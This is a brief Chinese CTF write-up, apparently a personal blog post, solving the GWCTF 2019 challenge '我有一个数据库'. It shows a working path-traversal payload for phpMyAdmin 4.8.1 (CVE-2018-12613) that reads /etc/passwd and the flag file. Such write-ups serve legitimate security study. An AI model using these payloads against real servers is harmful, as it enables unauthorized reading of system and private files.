当前位置:网站首页>[GWCTF 2019]我有一个数据库1
[GWCTF 2019]我有一个数据库1
2022-08-08 06:22:00 【Joker. .】
进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch
去扫一下了
可以看到有个/phpmyadmin界面访问一下
得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞
这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
接下来执行一下漏洞复现
payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd
执行成功,既然/etc/passwd可以被读取成功,就直接尝试一下读取flag
payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag
拿到
(第一次写,纯纯记录一下)
边栏推荐
猜你喜欢
随机推荐
遥远的救世主
机器学习,信用卡项目(二分类问题)完整代码 + 详细注释
screen 命令修改默认快捷键ctrl + a
信息传输率(Information Translate Rate,ITR)
Kingbase ES创建过程,报错:PL/SQL block not end correctly
CUDA10安装支持gpu的tensorflow版本
摔倒检测综述
pycharm 自定义标识符颜色
docker修改mysql配置文件
【RPC】Mercury RPC
用原生js写轮播图(并实现手动及自动切换图片)
从ELF格式分析arm动态链接原理
终于搞懂了 super(XXXX, self).__init__()的作用是啥了
oracle的插入sql错误
人机对话中得意图识别(关键词提取,svm工具)
BAT必问JVM,你了解吗?
学习残差神经网络(ResNet)
Tensorboard 对训练性能影响
YoloV4训练自己的数据集(三)
模板引擎art-template